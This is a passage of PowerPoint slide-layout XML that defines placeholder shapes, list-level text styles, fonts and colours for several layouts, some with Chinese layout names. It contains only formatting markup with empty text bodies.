                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-114271" lvl="2" marL="1142971"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3pPr>
            <a:lvl4pPr indent="-114259" lvl="3" marL="1600160"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4pPr>
            <a:lvl5pPr indent="-114249" lvl="4" marL="2057349"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5pPr>
            <a:lvl6pPr indent="-114237" lvl="5" marL="2514537"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6pPr>
            <a:lvl7pPr indent="-114225" lvl="6" marL="2971726"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7pPr>
            <a:lvl8pPr indent="-114213" lvl="7" marL="3428914"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8pPr>
            <a:lvl9pPr indent="-114203" lvl="8" marL="3886103"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9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Shape 60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431800" y="6572250"/>
            <a:ext cx="2540000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Shape 61"/>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itleAndTx">
  <p:cSld name="直排標題及文字">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="62" name="Shape 62"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Shape 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7900460" y="1804458"/>
            <a:ext cx="5835651" cy="2747433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Shape 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2302933" y="-842433"/>
            <a:ext cx="5835651" cy="8041216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-165090" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-146031" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="➢"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-114271" lvl="2" marL="1142971"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3pPr>
            <a:lvl4pPr indent="-114259" lvl="3" marL="1600160"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4pPr>
            <a:lvl5pPr indent="-114249" lvl="4" marL="2057349"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5pPr>
            <a:lvl6pPr indent="-114237" lvl="5" marL="2514537"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6pPr>
            <a:lvl7pPr indent="-114225" lvl="6" marL="2971726"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7pPr>
            <a:lvl8pPr indent="-114213" lvl="7" marL="3428914"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8pPr>
            <a:lvl9pPr indent="-114203" lvl="8" marL="3886103"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9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Shape 65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431800" y="6572250"/>
            <a:ext cx="2540000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Shape 66"/>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bl">
  <p:cSld name="標題及表格">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="67" name="Shape 67"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Shape 68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068983" cy="827088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Shape 69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431800" y="6572250"/>
            <a:ext cx="2540000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
